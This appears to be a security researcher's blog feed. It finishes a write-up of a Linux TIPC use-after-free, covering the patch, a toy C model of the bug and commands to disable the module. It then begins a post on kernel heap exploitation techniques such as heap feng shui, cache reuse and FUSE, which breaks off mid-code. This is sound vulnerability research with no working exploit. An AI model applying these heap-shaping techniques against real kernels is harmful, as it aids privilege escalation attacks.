</span></span><span class="line"><span class="cl">        <span class="nf">TIPC_SKB_CB</span><span class="p">(</span><span class="n">head</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">tail</span> <span class="o">=</span> <span class="n">frag</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="p">(</span><span class="n">fragid</span> <span class="o">==</span> <span class="n">LAST_FRAGMENT</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="nf">TIPC_SKB_CB</span><span class="p">(</span><span class="n">head</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">validated</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="p">(</span><span class="nf">unlikely</span><span class="p">(</span><span class="o">!</span><span class="nf">tipc_msg_validate</span><span class="p">(</span><span class="o">&amp;</span><span class="n">head</span><span class="p">)))</span>
</span></span><span class="line"><span class="cl">            <span class="k">goto</span> <span class="n">err</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="o">*</span><span class="n">buf</span> <span class="o">=</span> <span class="n">head</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="nf">TIPC_SKB_CB</span><span class="p">(</span><span class="n">head</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">tail</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="o">*</span><span class="n">headbuf</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">    <span class="o">*</span><span class="n">buf</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="nl">err</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">    <span class="nf">kfree_skb</span><span class="p">(</span><span class="o">*</span><span class="n">buf</span><span class="p">);</span>                                                <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">    <span class="nf">kfree_skb</span><span class="p">(</span><span class="o">*</span><span class="n">headbuf</span><span class="p">);</span>                                            <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">    <span class="o">*</span><span class="n">buf</span> <span class="o">=</span> <span class="o">*</span><span class="n">headbuf</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.7.4/source/net/tipc/msg.c#L124">net/tipc/msg.c</a> (6.7.4)</p>
<p>The initial free can occur at either site [0] or [1]. We&rsquo;ve covered the latter case, but if the last fragment was coalesced, then the initial free occurs at [0] instead.</p>
<hr>
<ol>
<li><a href="http://tipc.io/protocol.html">TIPC Protocol: 7.2.7. Message Fragmentation</a></li>
</ol>
<h2 id="exploitation">Exploitation</h2>
<p><img src="https://sam4k.com/content/images/2024/07/i_failed_you.gif" alt=""></p>
<p>Unfortunately I haven&rsquo;t had the time to work on putting together an exploit for this vulnerability, though I&rsquo;d love to set some time aside in the future. Sorry! :(</p>
<p>From an LPE perspective, the use-after-free of a <code>struct sk_buff</code> provides a pretty nice primitive due to its complexity and usage. There&rsquo;s been some nice write-ups in the past making good use of the structure for LPE, so check those out if interested <a href="https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-0920.html">[1]</a><a href="https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html">[2]</a>.</p>
<p>The RCE side of things is more opaque and something I&rsquo;m really keen to explore more. Two major roadblocks for Linux kernel RCE are KASLR and the drastically reduced surface for heap feng shui and, more generally, for influencing device state.</p>
<p>At least on the latter, we have some nice flexibility with this vulnerability. We have some control over the affected caches via our TIPC messages. The defer queue could potentially be used to introduce delays and control when objects are freed. Who knows!</p>
<hr>
<ol>
<li><a href="https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-0920.html">CVE-2021-0920: Android sk_buff use-after-free in Linux</a></li>
<li><a href="https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html">Four Bytes of Power: Exploiting CVE-2021-26708 in the Linux kernel</a></li>
</ol>
<p>Here are some posts on other TIPC related bugs and stuff for interested readers:</p>
<ol>
<li><a href="https://www.sentinelone.com/labs/tipc-remote-linux-kernel-heap-overflow-allows-arbitrary-code-execution/">CVE-2021-43267: Remote Linux Kernel Heap Overflow</a> by <a href="https://twitter.com/maxpl0it">@maxpl0it</a></li>
<li><a href="https://haxx.in/posts/pwning-tipc/">Exploiting CVE-2021-43267</a> by <a href="https://twitter.com/bl4sty">@bl4sty</a></li>
<li><a href="https://sam4k.com/cve-2022-0435-a-remote-stack-overflow-in-the-linux-kernel/">CVE-2022-0435: A Remote Stack Overflow in The Linux Kernel</a> by me</li>
</ol>
<h2 id="fix-remediation">Fix + Remediation</h2>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">---
</span></span><span class="line"><span class="cl"> net/tipc/msg.c | 6 +++++-
</span></span><span class="line"><span class="cl"> 1 file changed, 5 insertions(+), 1 deletion(-)
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">diff --git a/net/tipc/msg.c b/net/tipc/msg.c
</span></span><span class="line"><span class="cl">index 5c9fd4791c4ba1..9a6e9bcbf69402 100644
</span></span><span class="line"><span class="cl">--- a/net/tipc/msg.c
</span></span><span class="line"><span class="cl">+++ b/net/tipc/msg.c
</span></span><span class="line"><span class="cl">@@ -156,6 +156,11 @@ int tipc_buf_append(struct sk_buff **headbuf, struct sk_buff **buf)
</span></span><span class="line"><span class="cl"> 	if (!head)
</span></span><span class="line"><span class="cl"> 		goto err;
</span></span><span class="line"><span class="cl"> 
</span></span><span class="line"><span class="cl">+	/* Either the input skb ownership is transferred to headskb
</span></span><span class="line"><span class="cl">+	 * or the input skb is freed, clear the reference to avoid
</span></span><span class="line"><span class="cl">+	 * bad access on error path.
</span></span><span class="line"><span class="cl">+	 */
</span></span><span class="line"><span class="cl">+	*buf = NULL;
</span></span><span class="line"><span class="cl"> 	if (skb_try_coalesce(head, frag, &amp;headstolen, &amp;delta)) {
</span></span><span class="line"><span class="cl"> 		kfree_skb_partial(frag, headstolen);
</span></span><span class="line"><span class="cl"> 	} else {
</span></span><span class="line"><span class="cl">@@ -179,7 +184,6 @@ int tipc_buf_append(struct sk_buff **headbuf, struct sk_buff **buf)
</span></span><span class="line"><span class="cl"> 		*headbuf = NULL;
</span></span><span class="line"><span class="cl"> 		return 1;
</span></span><span class="line"><span class="cl"> 	}
</span></span><span class="line"><span class="cl">-	*buf = NULL;
</span></span><span class="line"><span class="cl"> 	return 0;
</span></span><span class="line"><span class="cl"> err:
</span></span><span class="line"><span class="cl"> 	kfree_skb(*buf);
</span></span></code></pre></div><p>Commit <a href="https://github.com/torvalds/linux/commit/080cbb890286cd794f1ee788bbc5463e2deb7c2b">080cbb890286</a>, authored by <a href="https://github.com/torvalds/linux/commits?author=kuba-moo">kuba-moo</a></p>
<p>We can see the patch is fairly simple (even if the context is not): the reference to the input skb ( <code>buf</code> ) is cleared before the error case that can cause the UAF. This is because the block handling the fragment coalescing/chaining already does the appropriate cleanup for it via <code>frag</code> (which at this point is also a reference to the input skb).</p>
<p>It&rsquo;s a bit clearer if we provide some more context:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl">    <span class="cm">/* Either the input skb ownership is transferred to headskb
</span></span></span><span class="line"><span class="cl"><span class="cm">     * or the input skb is freed, clear the reference to avoid
</span></span></span><span class="line"><span class="cl"><span class="cm">     * bad access on error path.
</span></span></span><span class="line"><span class="cl"><span class="cm">     */</span>
</span></span><span class="line"><span class="cl">    <span class="o">*</span><span class="n">buf</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="p">(</span><span class="nf">skb_try_coalesce</span><span class="p">(</span><span class="n">head</span><span class="p">,</span> <span class="n">frag</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">headstolen</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">delta</span><span class="p">))</span> <span class="p">{</span>  <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">        <span class="nf">kfree_skb_partial</span><span class="p">(</span><span class="n">frag</span><span class="p">,</span> <span class="n">headstolen</span><span class="p">);</span>                  <span class="p">[</span><span class="mi">3</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>                                                  <span class="p">[</span><span class="mi">4</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">        <span class="n">tail</span> <span class="o">=</span> <span class="nf">TIPC_SKB_CB</span><span class="p">(</span><span class="n">head</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">tail</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nf">skb_has_frag_list</span><span class="p">(</span><span class="n">head</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">            <span class="nf">skb_shinfo</span><span class="p">(</span><span class="n">head</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">frag_list</span> <span class="o">=</span> <span class="n">frag</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="k">else</span>
</span></span><span class="line"><span class="cl">            <span class="n">tail</span><span class="o">-&gt;</span><span class="n">next</span> <span class="o">=</span> <span class="n">frag</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="n">head</span><span class="o">-&gt;</span><span class="n">truesize</span> <span class="o">+=</span> <span class="n">frag</span><span class="o">-&gt;</span><span class="n">truesize</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="n">head</span><span class="o">-&gt;</span><span class="n">data_len</span> <span class="o">+=</span> <span class="n">frag</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="n">head</span><span class="o">-&gt;</span><span class="n">len</span> <span class="o">+=</span> <span class="n">frag</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="nf">TIPC_SKB_CB</span><span class="p">(</span><span class="n">head</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">tail</span> <span class="o">=</span> <span class="n">frag</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="p">(</span><span class="n">fragid</span> <span class="o">==</span> <span class="n">LAST_FRAGMENT</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="nf">TIPC_SKB_CB</span><span class="p">(</span><span class="n">head</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">validated</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="p">(</span><span class="nf">unlikely</span><span class="p">(</span><span class="o">!</span><span class="nf">tipc_msg_validate</span><span class="p">(</span><span class="o">&amp;</span><span class="n">head</span><span class="p">)))</span>
</span></span><span class="line"><span class="cl">            <span class="k">goto</span> <span class="n">err</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="o">*</span><span class="n">buf</span> <span class="o">=</span> <span class="n">head</span><span class="p">;</span>                                          <span class="p">[</span><span class="mi">0</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">        <span class="nf">TIPC_SKB_CB</span><span class="p">(</span><span class="n">head</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">tail</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="o">*</span><span class="n">headbuf</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">    <span class="c1">// before the patch: *buf = NULL;                         [1]
</span></span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="nl">err</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">    <span class="nf">kfree_skb</span><span class="p">(</span><span class="o">*</span><span class="n">buf</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="nf">kfree_skb</span><span class="p">(</span><span class="o">*</span><span class="n">headbuf</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="o">*</span><span class="n">buf</span> <span class="o">=</span> <span class="o">*</span><span class="n">headbuf</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p>net/tipc/msg.c (it&rsquo;s not on elixir yet, but will link)</p>
<p>So if we recall our vulnerable case, after we&rsquo;ve chained our last fragment, if the TIPC header of the fragmented message (which is now assembled) is invalid, we hit the error case at [0]. We then go to <code>err:</code> and cause the UAF, as <code>buf</code> was never cleared at [1].</p>
<p>By the time we reach [2] we know that the input skb is a trailing fragment and is referenced by both <code>buf</code> and <code>frag</code>. At this point we don&rsquo;t need the <code>buf</code> reference as the following block handles the input skb appropriately via <code>frag</code>: either it is coalesced into <code>head</code> and freed [3] or it is added to <code>head</code>&rsquo;s frag list at which point <code>head</code> is responsible for it [4].</p>
<p>As a result, we can just clear the unnecessary <code>buf</code> reference before it can cause any trouble. Hopefully that&rsquo;s not too convoluted an explanation for a simple patch!</p>
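<p>If it helps, here&rsquo;s a minimal userspace sketch of the same ownership pattern. Everything in it (<code>toy_buf</code>, <code>toy_free()</code>, <code>toy_append()</code>) is hypothetical and only mimics the shape of the function: the fragment is always &ldquo;freed&rdquo; at the hand-off point, and frees are counted rather than performed so a double free is visible instead of fatal.</p>

```c
#include <stddef.h>

/* Toy stand-in for an skb; NOT the kernel's struct sk_buff. */
struct toy_buf {
    int freed;              /* incremented each time the buffer is "freed" */
};

/* Hypothetical free helper: counts frees instead of releasing memory,
 * so a double free shows up as freed > 1 rather than crashing. */
static void toy_free(struct toy_buf *b)
{
    if (b)
        b->freed++;
}

/* Mirrors the shape of the patched function. clear_early selects the
 * patched behaviour (drop the caller's reference before the hand-off),
 * fail forces the error path. */
static int toy_append(struct toy_buf **buf, int clear_early, int fail)
{
    struct toy_buf *frag = *buf;

    if (clear_early)
        *buf = NULL;        /* patched: reference cleared up front */

    toy_free(frag);         /* hand-off: ownership of frag ends here */

    if (fail)
        goto err;

    *buf = NULL;            /* pre-patch: only cleared on success */
    return 0;
err:
    toy_free(*buf);         /* no-op if the reference was already cleared */
    *buf = NULL;
    return -1;
}
```

<p>With <code>clear_early</code> set to 0 and a forced failure the buffer ends up freed twice; with it set to 1 the error path sees <code>NULL</code> and the buffer is only freed once.</p>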
<h3 id="remediation">Remediation</h3>
<p>Chances are, as I mentioned up top, unless you&rsquo;re running TIPC you&rsquo;re all good! However, if you are, or want to be extra safe, prior to a patch being made available, the TIPC module can be disabled from loading if not in use:</p>
<ul>
<li><code>$ lsmod | grep tipc</code> will let you know if the module is currently loaded,</li>
<li><code>modprobe -r tipc</code> may allow you to unload the module if loaded, however you may need to reboot your system</li>
<li><code>$ echo &quot;install tipc /bin/true&quot; &gt;&gt; /etc/modprobe.d/disable-tipc.conf</code> will prevent the module from being loaded, which is a good idea if you have no reason to use it</li>
</ul>
<h2 id="wrapup">Wrapup</h2>
<p><img src="https://sam4k.com/content/images/2024/04/i_think_our_work_here_is_done.gif" alt=""></p>
<p>As always, thank you for surviving up until this point! This research has been super fun, hopefully this has been an interesting read and not missing <em>too</em> much context; I appreciate it&rsquo;s a particularly complex topic with lots of moving parts. Also, this was somewhat rushed due to having a lot going on at the moment, so I apologise for any drop in quality!</p>
<p>I&rsquo;d like to thank ZDI and the Linux kernel maintainers for the work involved in getting this vulnerability disclosed and patched!</p>
<p>There&rsquo;s quite a few things I&rsquo;d love to do in follow-up to this post, if I can only find the time! I&rsquo;d be happy to go into more detail on the discovery process and working with syzkaller, I <em>really</em> want to play around with exploitation and I also think it&rsquo;d be neat to expand the Linternals blog series with some networking content!</p>
<p>In the meanwhile, if you&rsquo;re interested in modifying syzkaller, check out <a href="https://x.com/notselwyn/">@notselwyn</a>&rsquo;s post on &ldquo;<a href="https://pwning.tech/ksmbd-syzkaller/#4-adding-kcov-support-to-ksmbd">Tickling ksmbd: fuzzing SMB in the Linux kernel</a>&rdquo;, I found it super helpful!</p>
<p>Feel free to <a href="https://twitter.com/sam4k1">@me</a> if you have any questions, suggestions or corrections :)</p>
<p>exit(0);</p>
]]></content:encoded></item><item><title>Exploring Linux's New Random Kmalloc Caches</title><description>Let&amp;#39;s explore the modern kernel heap exploitation meta and how the new RANDOM_KMALLOC_CACHES tries to address it.</description><link>https://sam4k.com/exploring-linux-random-kmalloc-caches/</link><guid isPermaLink="false">651b253092020209c38fcfed</guid><category>linux</category><category>kernel</category><category>memory</category><category>xdev</category><dc:creator>sam4k</dc:creator><pubDate>Fri, 03 Nov 2023 14:10:43 +0000</pubDate><media:content url="https://sam4k.com/content/images/2023/10/tired_computer.gif" medium="image"/><content:encoded><![CDATA[<p>In this post we&rsquo;re going to be taking a look at the state of contemporary kernel heap exploitation and how the new opt-in hardening feature added in the 6.6 Linux kernel, <code>RANDOM_KMALLOC_CACHES</code>, looks to address that.</p>
<p>To provide some context to the problems <code>RANDOM_KMALLOC_CACHES</code> tries to address, we&rsquo;ll spend a bit of time covering the current heap exploitation meta. This actually ended up being reasonably in-depth (oops) and touches on general approaches to exploitation as well as current mitigations and techniques such as heap feng shui, cache reuse attacks, FUSE and making use of elastic objects.</p>
<p>Armed with that information we&rsquo;ll then explore the new patch in detail, discuss how it addresses heap exploitation and have a bit of fun speculating how the meta might shift as a result of this.</p>
<p>As this post is focusing on kernel heap exploitation, I&rsquo;ll be assuming some prerequisite knowledge around topics like kernel memory allocators (luckily for you I&rsquo;ve written about this already in some detail as part of Linternals, <a href="https://sam4k.com/linternals-introduction/#contents">here</a>).</p>
<h2 id="contents">Contents</h2>
<ul>
<li><a href="#current-heap-exploitation-meta">Current Heap Exploitation Meta</a>
<ul>
<li><a href="#approaching-heap-exploitation">Approaching Heap Exploitation</a></li>
<li><a href="#current-mitigations">Current Mitigations</a></li>
<li><a href="#generic-techniques">Generic Techniques</a>
<ul>
<li><a href="#basic-heap-feng-shui">Basic Heap Feng Shui</a></li>
<li><a href="#cache-reuseoverflow-attacks">Cache Reuse Attacks</a></li>
<li><a href="#elastic-objects">Elastic Objects</a></li>
<li><a href="#fuse">FUSE</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#introducing-random-kmalloc-caches">Introducing Random Kmalloc Caches</a></li>
<li><a href="#diving-into-the-implementation">Diving Into The Implementation</a>
<ul>
<li><a href="#cache-setup">Cache Setup</a></li>
<li><a href="#seed-setup">Seed Setup</a></li>
<li><a href="#kmalloc-allocations">Kmalloc Allocations</a></li>
<li><a href="#thoughts">Thoughts</a></li>
</ul>
</li>
<li><a href="#whats-the-new-meta">What&rsquo;s The New Meta?</a></li>
<li><a href="#wrapping-up">Wrapping Up</a></li>
</ul>
<h2 id="current-heap-exploitation-meta">Current Heap Exploitation Meta</h2>
<p><img src="https://sam4k.com/content/images/2023/10/need_context.gif" alt=""></p>
<p>Alright, before we dive into the juicy details let&rsquo;s quickly touch on the current state of heap exploitation to help us understand why this patch was added and how it affects things!</p>
<p>Heap corruption is one of the more common types of bugs found in the kernel today (think use-after-free, heap overflow etc.). When we talk about heap corruption in the Linux kernel, we&rsquo;re referring to memory dynamically allocated via the slab allocator (e.g. <a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L590"><code>kmalloc()</code></a>) or directly via the page allocator (e.g. <a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/gfp.h#L269"><code>alloc_pages()</code></a>).</p>
<p>The fundamental goal of exploitation is to leverage our heap corruption to gain more control over the system, typically to elevate our privileges or at least get closer to being able to do so.</p>
<p>In reality, these heap corruptions can come in all shapes and sizes. The objects we&rsquo;re able to use-after-free can come from different caches, there may be a race involved, there may be fields which need to be specific values etc. Similarly our overflows can also have any number of constraints which impact our approach to leverage the corruption.</p>
<p>However, there exist a number of generic techniques for heap exploitation, which help cut down on the time needed to go from heap corruption to working exploit. As we know, security is a cat and mouse game, so these techniques are continually adapting to keep up with new mitigations.</p>
<p>From a defender&rsquo;s perspective, in an ideal world we would mitigate heap corruption bugs entirely. Failing that, we can make it as hard as possible for attackers to leverage any heap corruption bugs they do find. Responding to the generic techniques used by attackers is a good way to go about this, forcing each bug to require a bespoke approach to exploit.</p>
<h3 id="approaching-heap-exploitation">Approaching Heap Exploitation</h3>
<p><img src="https://sam4k.com/content/images/2023/10/i_want_details.gif" alt=""></p>
<p>Okay, with the exposition out of the way, let&rsquo;s talk a bit about how we might go about exploiting a heap corruption in the kernel nowadays. I&rsquo;m going to (try to) keep things fairly high level, with a focus on the slab allocator side of things given the topic.</p>
<p>So first things first we want to make sure we understand the bug itself: how do we reach it, what kernel configurations or capabilities do we require? What is the nature of the corruption, is it a use-after-free? What are the limitations around triggering the bug? What data structures are affected, what are the risks of a kernel panic?</p>
<p>Then we want to get into the specifics of the heap corruption itself. How are the affected objects allocated? Is it via the slab allocator or the page allocator? For slab allocations, we&rsquo;re interested in what cache the object is allocated to, so we can infer what other objects share the same cache and can potentially be corrupted.</p>
<p>There are several factors to consider at the moment when determining what cache our object will end up in:</p>
<ul>
<li><strong>The API used</strong> will tell us if it&rsquo;s allocated into a general purpose cache with other similar sized objects (<code>kmalloc()</code>, <code>kzalloc()</code>, <code>kcalloc()</code> etc.) or a private cache (<a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L499"><code>kmem_cache_alloc()</code></a>) with slabs containing only objects of that type.</li>
<li><strong>The GFP (Get Free Page) flags</strong> used can tell us which of the general purpose cache types the object is allocated to. By default, allocations will go to the standard general purpose caches, <code>kmalloc-x</code>, where x is the &ldquo;bucket size&rdquo;. The other common case is <code>GFP_KERNEL_ACCOUNT</code>, typically used for untrusted allocations<a href="https://www.kernel.org/doc/Documentation/core-api/memory-allocation.rst">[1]</a>, which will put objects in an accounted cache, named <code>kmalloc-cg-x</code>.</li>
<li><strong>The size of the object</strong> will determine, for general purpose caches, which &ldquo;bucket size&rdquo; the object will end up in. The <code>x</code> in <code>kmalloc-x</code> denotes the fixed size in bytes allocated to each object in the cache&rsquo;s slabs. Objects will be allocated into the smallest general purpose cache they can fit into.</li>
</ul>
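<p>To make the &ldquo;smallest cache it fits into&rdquo; rule concrete, here&rsquo;s a rough userspace sketch. The bucket table is an assumption (roughly what you&rsquo;d see on a typical x86_64 SLUB build; the real set depends on architecture and config), and <code>kmalloc_bucket()</code> is a made-up helper, not a kernel API.</p>

```c
#include <stddef.h>

/* Assumed general purpose bucket sizes in bytes; the real list depends
 * on the architecture and kernel configuration. */
static const size_t kmalloc_buckets[] = {
    8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192,
};

/* Hypothetical helper: returns the smallest bucket that fits `size`,
 * or 0 if the request is larger than anything in the table above. */
static size_t kmalloc_bucket(size_t size)
{
    size_t n = sizeof(kmalloc_buckets) / sizeof(kmalloc_buckets[0]);

    for (size_t i = 0; i < n; i++) {
        if (size <= kmalloc_buckets[i])
            return kmalloc_buckets[i];
    }
    return 0;
}
```

<p>So under these assumptions a 40 byte object shares <code>kmalloc-64</code> with everything else between 33 and 64 bytes, which is exactly the pool of objects we get to pick corruption targets from.</p>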
<p>Now we&rsquo;ve built up an understanding of the bug and how the affected object is allocated, it&rsquo;s time to think about how we want to use our corruption. By knowing what cache our object is in, we know what other objects can or can&rsquo;t be allocated into the same slab.</p>
<p>The general goal here is to find a viable object to corrupt. We can use our understanding of how the slab allocator works in order to shape the layout of memory to make this more reliable, or to make otherwise incorruptible objects corruptible.</p>
<h3 id="current-mitigations">Current Mitigations</h3>
<p><img src="https://sam4k.com/content/images/2023/10/wait_wait_wait.gif" alt=""></p>
<p>However, before we get ahead of ourselves, we first have to consider any mitigations that might impact our ability to exploit our bug on modern systems. This won&rsquo;t be an exhaustive list, but will help provide some context on the current meta:</p>
<ul>
<li><a href="https://cateee.net/lkddb/web-lkddb/SLAB_FREELIST_HARDENED.html"><code>CONFIG_SLAB_FREELIST_HARDENED</code></a> adds checks to protect slab metadata, such as the freelist pointers stored in free objects within a SLUB slab, and checks for double-frees.</li>
<li><a href="https://cateee.net/lkddb/web-lkddb/SLAB_FREELIST_RANDOM.html"><code>CONFIG_SLAB_FREELIST_RANDOM</code></a> randomises the freelist order when a new cache slab is allocated, such that an attacker can&rsquo;t infer the order in which objects within that slab will be filled. The aim is to reduce the knowledge &amp; control attackers have over heap state.</li>
<li><a href="https://cateee.net/lkddb/web-lkddb/STATIC_USERMODEHELPER.html"><code>CONFIG_STATIC_USERMODEHELPER</code></a> mitigates a popular technique for leveraging heap corruption, which we&rsquo;ll touch on in the next section.</li>
<li>Slab merging, enabled via <code>slub_merge</code> bootarg or <code>CONFIG_SLAB_MERGE_DEFAULT=y</code>, allows slab caches to be merged for performance. As you can imagine, this is nice for attackers as it opens up our options for corruption.</li>
<li>Some others, which are less commonly enabled afaik, or out of scope include <a href="https://cateee.net/lkddb/web-lkddb/SHUFFLE_PAGE_ALLOCATOR.html"><code>CONFIG_SHUFFLE_PAGE_ALLOCATOR</code></a>, <a href="https://cateee.net/lkddb/web-lkddb/CFI_CLANG.html"><code>CONFIG_CFI_CLANG</code></a>, <code>init_on_alloc</code> / <a href="https://cateee.net/lkddb/web-lkddb/INIT_ON_ALLOC_DEFAULT_ON.html"><code>CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y</code></a> &amp; <code>init_on_free</code> / <a href="https://cateee.net/lkddb/web-lkddb/INIT_ON_FREE_DEFAULT_ON.html"><code>CONFIG_INIT_ON_FREE_DEFAULT_ON=y</code></a>.</li>
</ul>
<h3 id="generic-techniques">Generic Techniques</h3>
<p><img src="https://sam4k.com/content/images/2023/10/the_good_part.gif" alt=""></p>
<p>Okay, now we&rsquo;re ready to start pwning the heap. We understand our bug, the allocation context and the kind of mitigations we&rsquo;re dealing with. Let&rsquo;s explore some contemporary techniques used to get around these mitigations and exploit heap corruption bugs!</p>
<h4 id="basic-heap-feng-shui">Basic Heap Feng Shui</h4>
<p>A fundamental aspect of heap corruption is the ability to shape the heap, commonly referred to as &ldquo;heap feng shui&rdquo;. We can use our understanding of how the allocator works and the mitigations in place to try to get things where we want them in the heap.</p>
<p>Let&rsquo;s use a generic heap overflow to demonstrate this. We can overflow object <code>x</code> and we want to corrupt object <code>y</code>. They&rsquo;re in the same generic cache, so our goal is to land <code>y</code> adjacent to <code>x</code> in the same slab.</p>
<p>We want to consider how active the cache is (i.e. how much cache noise there is) and the system up-time, as this will give us an idea of the cache slab state. On a typical workload with a fairly busy cache size, we can assume there are likely to be several partially filled slabs; this is our starting state.</p>
<p><img src="https://sam4k.com/content/images/2023/10/1_partial_slabs.png" alt=""></p>
<p>A basic heap feng shui approach would be to first allocate a number of object <code>y</code> to fill up the holes in the partial slabs:</p>
<p><img src="https://sam4k.com/content/images/2023/10/2_filled_partials.png" alt=""></p>
<p>Then, we allocate several slabs&rsquo; worth of object <code>y</code>, which we can assume will trigger new slabs to be allocated, hopefully filled with object <code>y</code>:</p>
<p><img src="https://sam4k.com/content/images/2023/10/3_filled_new_slabs.png" alt=""></p>
<p>Then, from the second batch of allocations into new slabs, we would free every other allocation to try and create holes in the new slabs:</p>
<p><img src="https://sam4k.com/content/images/2023/10/4_holes.png" alt=""></p>
<p>We would then allocate our vulnerable object <code>x</code> in the hopes we have increased our chances that it will be allocated into one of the holes we just created:</p>
<p><img src="https://sam4k.com/content/images/2023/10/5_landed.png" alt=""></p>
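<p>The last few steps can be sketched as a toy simulation of a single fresh slab. Big caveats: this is plain userspace C, the 8-slot slab and all the names are hypothetical, and the first-fit &ldquo;allocator&rdquo; is a deliberate simplification that ignores freelist ordering and <code>CONFIG_SLAB_FREELIST_RANDOM</code> entirely. It&rsquo;s only meant to show why freeing every other <code>y</code> leaves <code>x</code> with a <code>y</code> neighbour.</p>

```c
#define SLOTS 8     /* objects per toy slab; hypothetical value */

enum slot { FREE_SLOT, OBJ_Y, OBJ_X };

/* First-fit allocation into the toy slab (a simplification, real
 * freelists don't work like this). Returns the slot index, or -1
 * if the slab is full. */
static int toy_alloc(enum slot *slab, enum slot kind)
{
    for (int i = 0; i < SLOTS; i++) {
        if (slab[i] == FREE_SLOT) {
            slab[i] = kind;
            return i;
        }
    }
    return -1;
}

/* Fill a fresh slab with y, free every other y to punch holes,
 * then allocate x. Returns the slot x landed in. */
static int toy_feng_shui(enum slot *slab)
{
    for (int i = 0; i < SLOTS; i++)
        slab[i] = FREE_SLOT;

    while (toy_alloc(slab, OBJ_Y) >= 0)
        ;                               /* fill the new slab with y */

    for (int i = 0; i < SLOTS; i += 2)
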